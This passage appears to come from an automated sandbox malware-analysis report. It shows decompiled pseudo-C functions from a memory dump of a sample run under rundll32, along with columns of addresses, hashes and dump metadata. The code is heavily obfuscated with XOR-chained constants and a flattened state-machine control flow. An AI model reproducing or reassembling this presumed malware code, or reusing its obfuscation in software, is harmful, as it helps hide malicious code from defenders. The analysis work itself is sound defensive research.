				_v60 = _v60 ^ 0x0034a0e9;
				_v84 = 0xc57bbf;
				_v84 = _v84 ^ 0x7beef004;
				_v84 = _v84 ^ 0x7b204221;
				_v52 = 0xc39e48;
				_t376 = 0x4d;
				_v52 = _v52 / _t376;
				_v52 = _v52 ^ 0x0006d078;
				_v108 = 0x102acf;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 ^ 0x000242b6;
				_v80 = 0xaaee53;
				_t377 = 0x79;
				_v80 = _v80 * 0x74;
				_v80 = _v80 ^ 0x4d7dabdb;
				_v88 = 0x1ad2b9;
				_v88 = _v88 | 0x310da8db;
				_v88 = _v88 ^ 0x311cb062;
				_v136 = 0x81cc6c;
				_v136 = _v136 >> 0xc;
				_v136 = _v136 << 0xd;
				_v136 = _v136 ^ 0x0107e876;
				_v96 = 0x2bc0c4;
				_v96 = _v96 * 0x4c;
				_v96 = _v96 ^ 0x0cfd01fe;
				_v176 = 0x403c4e;
				_t174 =  &_v176; // 0x403c4e
				_v176 =  *_t174 / _t377;
				_t180 =  &_v176; // 0x403c4e
				_v176 =  *_t180 * 0x5e;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x0632c8a8;
				_v44 = 0x1618ce;
				_v44 = _v44 + 0xffff8813;
				_v44 = _v44 ^ 0x00124c47;
				_v76 = 0x551030;
				_v76 = _v76 + 0x65ef;
				_v76 = _v76 ^ 0x005f521e;
				_v132 = 0xb7ed4f;
				_v132 = _v132 << 0xb;
				_v132 = _v132 >> 0xa;
				_v132 = _v132 ^ 0x002e4b92;
				_v64 = 0xfb13c3;
				_v64 = _v64 * 0x16;
				_v64 = _v64 ^ 0x159ca6b2;
				_v168 = 0x8e8363;
				_v168 = _v168 ^ 0x49fc5726;
				_v168 = _v168 >> 8;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0002bf0f;
				_v72 = 0x8b4c84;
				_t378 = 0x68;
				_v72 = _v72 / _t378;
				_v72 = _v72 ^ 0x00015b8a;
				_v128 = 0x282e65;
				_v128 = _v128 >> 3;
				_v128 = _v128 << 9;
				_v128 = _v128 ^ 0x0a079d52;
				_v156 = 0xadd370;
				_t379 = 0x3e;
				_v156 = _v156 / _t379;
				_v156 = _v156 << 0xf;
				_v156 = _v156 + 0xffff35e7;
				_v156 = _v156 ^ 0x66d9d095;
				_v164 = 0xb0b7ce;
				_v164 = _v164 + 0xffffdc7a;
				_v164 = _v164 * 0x61;
				_v164 = _v164 + 0xffff24b0;
				_v164 = _v164 ^ 0x42ea90cd;
				_v172 = 0xee7b33;
				_v172 = _v172 | 0x904c1683;
				_v172 = _v172 * 0x2c;
				_v172 = _v172 >> 4;
				_v172 = _v172 ^ 0x0e8d9d52;
				_v48 = 0xdaf5e6;
				_v48 = _v48 ^ 0xf4ca4d64;
				_v48 = _v48 ^ 0xf41f1779;
				goto L1;
				do {
					while(1) {
						L1:
						_t431 = _t382 - 0x9c1484f;
						if(_t431 > 0) {
							break;
						}
						if(_t431 == 0) {
							E00793DBC( &_v40, _t424, _v160, _v144, _v148);
							_t428 = _t428 + 0xc;
							_t382 = 0x9229f3e;
							continue;
						} else {
							if(_t382 == 0x3e8dc94) {
								_t382 = 0xb0d10f2;
								 *_t424 =  *_t424 & 0x00000000;
								_t424[1] = _v104;
								continue;
							} else {
								if(_t382 == 0x73dcb22) {
									E007A0DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
									_t428 = _t428 + 0x10;
									_t382 = 0xca0d778;
									continue;
								} else {
									if(_t382 == 0x8cfc35c) {
										E007A0DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
										_t428 = _t428 + 0x10;
										_t382 = 0xfa9ed0f;
										continue;
									} else {
										if(_t382 == 0x9229f3e) {
											E007B0E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
											_t428 = _t428 + 0x10;
											_t382 = 0xa7e786e;
											continue;
										} else {
											if(_t382 != 0x95701e8) {
												goto L24;
											} else {
												_push(_t382);
												_push(_t382);
												_t369 = E00797FF2(_t424[1]);
												 *_t424 = _t369;
												if(_t369 != 0) {
													_t382 = 0x9c1484f;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t424;
						_t322 =  *_t424 != 0;
						__eflags = _t322;
						return 0 | _t322;
					}
					__eflags = _t382 - 0xa7e786e;
					if(_t382 == 0xa7e786e) {
						E007A0DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
						_t428 = _t428 + 0x10;
						_t382 = 0x8cfc35c;
						goto L24;
					} else {
						__eflags = _t382 - 0xa84b454;
						if(__eflags == 0) {
							E007B0E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
						} else {
							__eflags = _t382 - 0xb0d10f2;
							if(_t382 == 0xb0d10f2) {
								_t424[1] = E007AC631(_t425);
								_t382 = 0x95701e8;
								goto L1;
							} else {
								__eflags = _t382 - 0xca0d778;
								if(_t382 == 0xca0d778) {
									E007A0DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
									_t428 = _t428 + 0x10;
									_t382 = 0xa84b454;
									goto L1;
								} else {
									__eflags = _t382 - 0xfa9ed0f;
									if(_t382 != 0xfa9ed0f) {
										goto L24;
									} else {
										E007A0DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
										_t428 = _t428 + 0x10;
										_t382 = 0x73dcb22;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t382 - 0xd4a25d5;
				} while (__eflags != 0);
				goto L27;
			}























































                                                                                                                          0x0079225a
                                                                                                                          0x00792262
                                                                                                                          0x00792269
                                                                                                                          0x0079226b
                                                                                                                          0x00792272
                                                                                                                          0x00792273
                                                                                                                          0x00792274
                                                                                                                          0x00792275
                                                                                                                          0x0079227a
                                                                                                                          0x00792282
                                                                                                                          0x00792285
                                                                                                                          0x0079228c
                                                                                                                          0x00792294
                                                                                                                          0x00792299
                                                                                                                          0x007922a7
                                                                                                                          0x007922ac
                                                                                                                          0x007922b0
                                                                                                                          0x007922b5
                                                                                                                          0x007922bd
                                                                                                                          0x007922c5
                                                                                                                          0x007922cd
                                                                                                                          0x007922d5
                                                                                                                          0x007922dd
                                                                                                                          0x007922e5
                                                                                                                          0x007922ed
                                                                                                                          0x007922f5
                                                                                                                          0x007922fd
                                                                                                                          0x0079230d
                                                                                                                          0x00792313
                                                                                                                          0x0079231b
                                                                                                                          0x00792323
                                                                                                                          0x0079232b
                                                                                                                          0x00792330
                                                                                                                          0x00792338
                                                                                                                          0x00792340
                                                                                                                          0x0079234c
                                                                                                                          0x00792351
                                                                                                                          0x00792357
                                                                                                                          0x0079235f
                                                                                                                          0x0079236a
                                                                                                                          0x00792375
                                                                                                                          0x00792380
                                                                                                                          0x00792388
                                                                                                                          0x00792390
                                                                                                                          0x00792398
                                                                                                                          0x007923a0
                                                                                                                          0x007923a8
                                                                                                                          0x007923ad
                                                                                                                          0x007923b2
                                                                                                                          0x007923ba
                                                                                                                          0x007923c7
                                                                                                                          0x007923c8
                                                                                                                          0x007923d2
                                                                                                                          0x007923d6
                                                                                                                          0x007923de
                                                                                                                          0x007923e6
                                                                                                                          0x007923ee
                                                                                                                          0x007923f3
                                                                                                                          0x007923fd
                                                                                                                          0x00792411
                                                                                                                          0x00792416
                                                                                                                          0x0079241f
                                                                                                                          0x0079242a
                                                                                                                          0x00792432
                                                                                                                          0x0079243f
                                                                                                                          0x00792442
                                                                                                                          0x00792446
                                                                                                                          0x0079244e
                                                                                                                          0x00792456
                                                                                                                          0x0079245e
                                                                                                                          0x0079246e
                                                                                                                          0x00792472
                                                                                                                          0x0079247a
                                                                                                                          0x00792485
                                                                                                                          0x00792490
                                                                                                                          0x0079249b
                                                                                                                          0x007924a3
                                                                                                                          0x007924ab
                                                                                                                          0x007924b3
                                                                                                                          0x007924c5
                                                                                                                          0x007924ca
                                                                                                                          0x007924d3
                                                                                                                          0x007924de
                                                                                                                          0x007924e6
                                                                                                                          0x007924eb
                                                                                                                          0x007924f3
                                                                                                                          0x00792500
                                                                                                                          0x00792501
                                                                                                                          0x00792505
                                                                                                                          0x0079250d
                                                                                                                          0x00792515
                                                                                                                          0x0079251d
                                                                                                                          0x00792525
                                                                                                                          0x0079252d
                                                                                                                          0x00792532
                                                                                                                          0x00792537
                                                                                                                          0x0079253f
                                                                                                                          0x0079254c
                                                                                                                          0x00792550
                                                                                                                          0x00792558
                                                                                                                          0x00792560
                                                                                                                          0x00792566
                                                                                                                          0x0079256a
                                                                                                                          0x0079256f
                                                                                                                          0x00792573
                                                                                                                          0x00792578
                                                                                                                          0x00792580
                                                                                                                          0x0079258b
                                                                                                                          0x00792596
                                                                                                                          0x007925a1
                                                                                                                          0x007925a9
                                                                                                                          0x007925b1
                                                                                                                          0x007925b9
                                                                                                                          0x007925c1
                                                                                                                          0x007925c6
                                                                                                                          0x007925cb
                                                                                                                          0x007925d3
                                                                                                                          0x007925e6
                                                                                                                          0x007925ed
                                                                                                                          0x007925f8
                                                                                                                          0x00792600
                                                                                                                          0x00792608
                                                                                                                          0x0079260d
                                                                                                                          0x00792612
                                                                                                                          0x0079261c
                                                                                                                          0x00792635
                                                                                                                          0x0079263a
                                                                                                                          0x00792643
                                                                                                                          0x0079264e
                                                                                                                          0x00792656
                                                                                                                          0x0079265b
                                                                                                                          0x00792660
                                                                                                                          0x00792668
                                                                                                                          0x00792674
                                                                                                                          0x0079267c
                                                                                                                          0x00792680
                                                                                                                          0x00792685
                                                                                                                          0x0079268d
                                                                                                                          0x00792695
                                                                                                                          0x0079269d
                                                                                                                          0x007926aa
                                                                                                                          0x007926ae
                                                                                                                          0x007926b6
                                                                                                                          0x007926be
                                                                                                                          0x007926c6
                                                                                                                          0x007926d3
                                                                                                                          0x007926d7
                                                                                                                          0x007926dc
                                                                                                                          0x007926e4
                                                                                                                          0x007926ef
                                                                                                                          0x007926fa
                                                                                                                          0x007926fa
                                                                                                                          0x00792705
                                                                                                                          0x00792705
                                                                                                                          0x00792705
                                                                                                                          0x00792705
                                                                                                                          0x00792707
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079270d
                                                                                                                          0x0079282a
                                                                                                                          0x0079282f
                                                                                                                          0x00792832
                                                                                                                          0x00000000
                                                                                                                          0x00792713
                                                                                                                          0x00792719
                                                                                                                          0x00792808
                                                                                                                          0x0079280a
                                                                                                                          0x0079280d
                                                                                                                          0x00000000
                                                                                                                          0x0079271f
                                                                                                                          0x00792725
                                                                                                                          0x007927f2
                                                                                                                          0x007927f7
                                                                                                                          0x007927fa
                                                                                                                          0x00000000
                                                                                                                          0x0079272b
                                                                                                                          0x00792731
                                                                                                                          0x007927c0
                                                                                                                          0x007927c5
                                                                                                                          0x007927c8
                                                                                                                          0x00000000
                                                                                                                          0x00792733
                                                                                                                          0x00792739
                                                                                                                          0x0079278b
                                                                                                                          0x00792790
                                                                                                                          0x00792793
                                                                                                                          0x00000000
                                                                                                                          0x0079273b
                                                                                                                          0x00792741
                                                                                                                          0x00000000
                                                                                                                          0x00792747
                                                                                                                          0x00792756
                                                                                                                          0x00792757
                                                                                                                          0x00792758
                                                                                                                          0x0079275d
                                                                                                                          0x00792763
                                                                                                                          0x00792769
                                                                                                                          0x00000000
                                                                                                                          0x00792769
                                                                                                                          0x00792763
                                                                                                                          0x00792741
                                                                                                                          0x00792739
                                                                                                                          0x00792731
                                                                                                                          0x00792725
                                                                                                                          0x00792719
                                                                                                                          0x0079293e
                                                                                                                          0x00792940
                                                                                                                          0x00792945
                                                                                                                          0x00792945
                                                                                                                          0x0079294f
                                                                                                                          0x0079294f
                                                                                                                          0x0079283c
                                                                                                                          0x00792842
                                                                                                                          0x007928fd
                                                                                                                          0x00792902
                                                                                                                          0x00792905
                                                                                                                          0x00000000
                                                                                                                          0x00792848
                                                                                                                          0x00792848
                                                                                                                          0x0079284e
                                                                                                                          0x00792936
                                                                                                                          0x00792854
                                                                                                                          0x00792854
                                                                                                                          0x00792856
                                                                                                                          0x007928d3
                                                                                                                          0x007928d6
                                                                                                                          0x00000000
                                                                                                                          0x00792858
                                                                                                                          0x00792858
                                                                                                                          0x0079285e
                                                                                                                          0x007928ba
                                                                                                                          0x007928bf
                                                                                                                          0x007928c2
                                                                                                                          0x00000000
                                                                                                                          0x00792860
                                                                                                                          0x00792860
                                                                                                                          0x00792866
                                                                                                                          0x00000000
                                                                                                                          0x0079286c
                                                                                                                          0x00792889
                                                                                                                          0x0079288e
                                                                                                                          0x00792891
                                                                                                                          0x00000000
                                                                                                                          0x00792891
                                                                                                                          0x00792866
                                                                                                                          0x0079285e
                                                                                                                          0x00792856
                                                                                                                          0x0079284e
                                                                                                                          0x00000000
                                                                                                                          0x0079290a
                                                                                                                          0x0079290a
                                                                                                                          0x0079290a
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
                                                                                                                          • API String ID: 0-245365489
                                                                                                                          • Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                          • Instruction ID: 837e9b62f42f2b7f7a0c2e11ffe5565dd06933a40b7202369227280efaae39a3
                                                                                                                          • Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                          • Instruction Fuzzy Hash: D5F141725083809FD768DF61C88AA5BFBF1FBD4348F10890DE29A86261D7B58959CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00799714 Relevance: 14.0, Strings: 11, Instructions: 232COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00799714(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t251;
				intOrPtr _t252;
				intOrPtr _t253;
				void* _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				void* _t292;
				void* _t293;
				signed int* _t296;
				signed int* _t297;

				_t296 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xc5b764;
				_v8 = 0xb6da07;
				_v100 = 0x6b81aa;
				_v100 = _v100 ^ 0x5133456b;
				_t8 =  &_v100; // 0x5133456b
				_v100 =  *_t8 * 0x6e;
				_t292 = __edx;
				_v100 = _v100 << 0xa;
				_v100 = _v100 ^ 0x922ec96f;
				_t257 = __ecx;
				_v20 = 0x2c208b;
				_t293 = 0x52ffaa2;
				_v20 = _v20 + 0xffff37e6;
				_v20 = _v20 ^ 0x00212911;
				_v60 = 0xb21c01;
				_v60 = _v60 ^ 0x31980a41;
				_v60 = _v60 + 0xffff033c;
				_v60 = _v60 ^ 0x31255444;
				_v64 = 0x612501;
				_v64 = _v64 << 2;
				_v64 = _v64 + 0xf44;
				_v64 = _v64 ^ 0x018d6347;
				_v52 = 0x111460;
				_v52 = _v52 + 0xffffc2ff;
				_v52 = _v52 | 0x8d441097;
				_v52 = _v52 ^ 0x8d5fe5cb;
				_v56 = 0xb6e38a;
				_t259 = 0x67;
				_v56 = _v56 / _t259;
				_t260 = 0x41;
				_v56 = _v56 * 0x32;
				_v56 = _v56 ^ 0x00536033;
				_v96 = 0xaa1e09;
				_v96 = _v96 / _t260;
				_t261 = 0x73;
				_v96 = _v96 * 0xd;
				_v96 = _v96 / _t261;
				_v96 = _v96 ^ 0x00047537;
				_v88 = 0xebbfc;
				_v88 = _v88 << 7;
				_v88 = _v88 | 0x3053ba58;
				_t262 = 0x7f;
				_v88 = _v88 / _t262;
				_v88 = _v88 ^ 0x006c206b;
				_v44 = 0xece271;
				_v44 = _v44 + 0xffff86ef;
				_v44 = _v44 + 0x6a70;
				_v44 = _v44 ^ 0x00eb9b45;
				_v48 = 0xd70038;
				_v48 = _v48 | 0x378b661e;
				_v48 = _v48 ^ 0xfc23f8e2;
				_v48 = _v48 ^ 0xcbf8b4c1;
				_v92 = 0x86f3ef;
				_v92 = _v92 << 0xd;
				_v92 = _v92 >> 0xd;
				_v92 = _v92 + 0x4513;
				_v92 = _v92 ^ 0x000ef1b6;
				_v80 = 0x7a204;
				_v80 = _v80 + 0xffffa60a;
				_v80 = _v80 | 0x4d150135;
				_v80 = _v80 + 0xffff9d32;
				_v80 = _v80 ^ 0x4d179d3b;
				_v40 = 0x124198;
				_v40 = _v40 ^ 0x5335feb3;
				_t263 = 0x78;
				_v40 = _v40 * 0x18;
				_v40 = _v40 ^ 0xcbb00a78;
				_v84 = 0xcaa24a;
				_v84 = _v84 * 0x42;
				_v84 = _v84 ^ 0x45be5790;
				_v84 = _v84 + 0xffff0d2f;
				_v84 = _v84 ^ 0x718e360f;
				_v24 = 0x4d7038;
				_v24 = _v24 | 0x28b75b7a;
				_v24 = _v24 ^ 0x28f4655f;
				_v28 = 0x844762;
				_v28 = _v28 ^ 0xe0e1df8a;
				_v28 = _v28 ^ 0xe064bc9e;
				_v32 = 0xfc2930;
				_v32 = _v32 / _t263;
				_v32 = _v32 ^ 0x00028374;
				_v104 = 0xce3f74;
				_v104 = _v104 + 0x3224;
				_v104 = _v104 + 0x85ca;
				_t264 = 0xe;
				_v104 = _v104 / _t264;
				_v104 = _v104 ^ 0x0007887d;
				_v68 = 0x11fdc1;
				_v68 = _v68 | 0x0fd109af;
				_t265 = 0x52;
				_v68 = _v68 / _t265;
				_v68 = _v68 ^ 0x00367c27;
				_v72 = 0xa9a7e;
				_v72 = _v72 * 0x16;
				_v72 = _v72 ^ 0xca0bce5f;
				_v72 = _v72 ^ 0xcae4b7d2;
				_v76 = 0xb2d6c0;
				_v76 = _v76 + 0xffff5dcd;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0002e66e;
				_v16 = 0x41627;
				_v16 = _v16 + 0xccf7;
				_v16 = _v16 ^ 0x00091dff;
				_v36 = 0xd94625;
				_v36 = _v36 + 0x741;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x4d68793e;
				while(1) {
					L1:
					_t251 = 0xc3f018b;
					do {
						L2:
						while(_t293 != 0x52ffaa2) {
							if(_t293 == 0x865547f) {
								_t265 = _v80;
								_t252 = E0079CDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
								_t296 =  &(_t296[2]);
								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
								__eflags = _t252;
								_t251 = 0xc3f018b;
								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t293 == 0xb133873) {
								_push(_v64);
								_t253 = E007AC3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
								_t297 =  &(_t296[4]);
								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
								__eflags = _t253;
								if(_t253 != 0) {
									E00797B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
									_push( *((intOrPtr*)(_t292 + 0x38)));
									_push(_v92);
									_push(_v48);
									_t265 = _v88;
									E00797C37(_v88, _v44);
									_t296 =  &(_t297[6]);
									_t293 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t293 == 0xb7a2405) {
									return E007A9E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
								}
								if(_t293 != _t251) {
									goto L13;
								} else {
									_t253 = E007946BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E0079219A, _v72);
									_t296 =  &(_t296[0xa]);
									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
									if(_t253 == 0) {
										_t293 = 0xb7a2405;
										while(1) {
											L1:
											_t251 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t253;
						}
						_t293 = 0xb133873;
						L13:
						__eflags = _t293 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t251;
				}
			}











































                                                                                                                          0x00799714
                                                                                                                          0x00799717
                                                                                                                          0x0079971c
                                                                                                                          0x00799724
                                                                                                                          0x0079972c
                                                                                                                          0x00799734
                                                                                                                          0x0079973c
                                                                                                                          0x00799745
                                                                                                                          0x00799749
                                                                                                                          0x0079974b
                                                                                                                          0x00799752
                                                                                                                          0x0079975a
                                                                                                                          0x0079975c
                                                                                                                          0x00799764
                                                                                                                          0x00799769
                                                                                                                          0x00799771
                                                                                                                          0x00799779
                                                                                                                          0x00799781
                                                                                                                          0x00799789
                                                                                                                          0x00799791
                                                                                                                          0x00799799
                                                                                                                          0x007997a1
                                                                                                                          0x007997a6
                                                                                                                          0x007997ae
                                                                                                                          0x007997b6
                                                                                                                          0x007997be
                                                                                                                          0x007997c6
                                                                                                                          0x007997ce
                                                                                                                          0x007997d6
                                                                                                                          0x007997e4
                                                                                                                          0x007997e9
                                                                                                                          0x007997f4
                                                                                                                          0x007997f7
                                                                                                                          0x007997fb
                                                                                                                          0x00799803
                                                                                                                          0x00799813
                                                                                                                          0x0079981c
                                                                                                                          0x0079981f
                                                                                                                          0x0079982b
                                                                                                                          0x0079982f
                                                                                                                          0x00799837
                                                                                                                          0x0079983f
                                                                                                                          0x00799844
                                                                                                                          0x00799850
                                                                                                                          0x00799853
                                                                                                                          0x00799857
                                                                                                                          0x0079985f
                                                                                                                          0x00799867
                                                                                                                          0x0079986f
                                                                                                                          0x00799877
                                                                                                                          0x0079987f
                                                                                                                          0x00799887
                                                                                                                          0x0079988f
                                                                                                                          0x00799897
                                                                                                                          0x0079989f
                                                                                                                          0x007998a7
                                                                                                                          0x007998ac
                                                                                                                          0x007998b1
                                                                                                                          0x007998b9
                                                                                                                          0x007998c1
                                                                                                                          0x007998c9
                                                                                                                          0x007998d3
                                                                                                                          0x007998e0
                                                                                                                          0x007998e8
                                                                                                                          0x007998f0
                                                                                                                          0x007998f8
                                                                                                                          0x00799907
                                                                                                                          0x0079990a
                                                                                                                          0x0079990e
                                                                                                                          0x00799916
                                                                                                                          0x00799923
                                                                                                                          0x00799927
                                                                                                                          0x0079992f
                                                                                                                          0x00799937
                                                                                                                          0x0079993f
                                                                                                                          0x00799947
                                                                                                                          0x0079994f
                                                                                                                          0x00799957
                                                                                                                          0x0079995f
                                                                                                                          0x00799967
                                                                                                                          0x0079996f
                                                                                                                          0x0079997f
                                                                                                                          0x00799983
                                                                                                                          0x0079998b
                                                                                                                          0x00799993
                                                                                                                          0x0079999b
                                                                                                                          0x007999a7
                                                                                                                          0x007999ac
                                                                                                                          0x007999b2
                                                                                                                          0x007999ba
                                                                                                                          0x007999c2
                                                                                                                          0x007999ce
                                                                                                                          0x007999d1
                                                                                                                          0x007999d5
                                                                                                                          0x007999dd
                                                                                                                          0x007999ea
                                                                                                                          0x007999ee
                                                                                                                          0x007999f6
                                                                                                                          0x007999fe
                                                                                                                          0x00799a06
                                                                                                                          0x00799a0e
                                                                                                                          0x00799a13
                                                                                                                          0x00799a18
                                                                                                                          0x00799a20
                                                                                                                          0x00799a28
                                                                                                                          0x00799a30
                                                                                                                          0x00799a38
                                                                                                                          0x00799a40
                                                                                                                          0x00799a48
                                                                                                                          0x00799a4d
                                                                                                                          0x00799a55
                                                                                                                          0x00799a55
                                                                                                                          0x00799a55
                                                                                                                          0x00799a5a
                                                                                                                          0x00000000
                                                                                                                          0x00799a5a
                                                                                                                          0x00799a6c
                                                                                                                          0x00799b32
                                                                                                                          0x00799b36
                                                                                                                          0x00799b3b
                                                                                                                          0x00799b3e
                                                                                                                          0x00799b41
                                                                                                                          0x00799b45
                                                                                                                          0x00799b4a
                                                                                                                          0x00000000
                                                                                                                          0x00799b4a
                                                                                                                          0x00799a78
                                                                                                                          0x00799ac5
                                                                                                                          0x00799ad8
                                                                                                                          0x00799add
                                                                                                                          0x00799ae0
                                                                                                                          0x00799ae3
                                                                                                                          0x00799ae5
                                                                                                                          0x00799afd
                                                                                                                          0x00799b02
                                                                                                                          0x00799b05
                                                                                                                          0x00799b09
                                                                                                                          0x00799b11
                                                                                                                          0x00799b15
                                                                                                                          0x00799b1a
                                                                                                                          0x00799b1d
                                                                                                                          0x00000000
                                                                                                                          0x00799b1d
                                                                                                                          0x00799a7a
                                                                                                                          0x00799a7c
                                                                                                                          0x00000000
                                                                                                                          0x00799b7a
                                                                                                                          0x00799a84
                                                                                                                          0x00000000
                                                                                                                          0x00799a8a
                                                                                                                          0x00799aae
                                                                                                                          0x00799ab3
                                                                                                                          0x00799ab6
                                                                                                                          0x00799abb
                                                                                                                          0x00799ac1
                                                                                                                          0x00799a55
                                                                                                                          0x00799a55
                                                                                                                          0x00799a55
                                                                                                                          0x00000000
                                                                                                                          0x00799a55
                                                                                                                          0x00799a55
                                                                                                                          0x00799abb
                                                                                                                          0x00799a84
                                                                                                                          0x00799b82
                                                                                                                          0x00799b82
                                                                                                                          0x00799b52
                                                                                                                          0x00799b57
                                                                                                                          0x00799b57
                                                                                                                          0x00799b57
                                                                                                                          0x00000000
                                                                                                                          0x00799a5a

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
                                                                                                                          • API String ID: 0-1622084174
                                                                                                                          • Opcode ID: 3d52fc902c02f262a8fe7634be7bb8022bcbb1850088094ffd657f1df36bc98b
                                                                                                                          • Instruction ID: 031944ac803ccad1c89fbfcfc16c3580730d19ea97a988e5015d53aa1522ce99
                                                                                                                          • Opcode Fuzzy Hash: 3d52fc902c02f262a8fe7634be7bb8022bcbb1850088094ffd657f1df36bc98b
                                                                                                                          • Instruction Fuzzy Hash: 2EB130B2508341AFD758CF25D58A80BFBE1FBC4758F00891DF69A96220D3B9D959CF82
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007964E2 Relevance: 12.9, Strings: 10, Instructions: 358COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007964E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				signed int _v264;
				intOrPtr _v268;
				char _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				void* _t311;
				void* _t332;
				intOrPtr _t335;
				intOrPtr _t338;
				intOrPtr _t343;
				void* _t345;
				void* _t347;
				void* _t349;
				void* _t352;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr* _t362;
				intOrPtr _t364;
				signed int _t367;
				intOrPtr _t386;
				intOrPtr _t387;
				intOrPtr _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t423;
				signed int* _t425;
				void* _t427;

				_push(_a24);
				_t423 = __edx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t311);
				_v264 = _v264 & 0x00000000;
				_t425 =  &(( &_v412)[8]);
				_v268 = 0x38f10b;
				_v376 = 0x1d6e4;
				_t364 = 0;
				_v376 = _v376 + 0x2cf5;
				_t367 = 0x349a1a2;
				_v376 = _v376 + 0xffffbc4f;
				_v376 = _v376 + 0xc828;
				_v376 = _v376 ^ 0x000c4abe;
				_v344 = 0xf0b614;
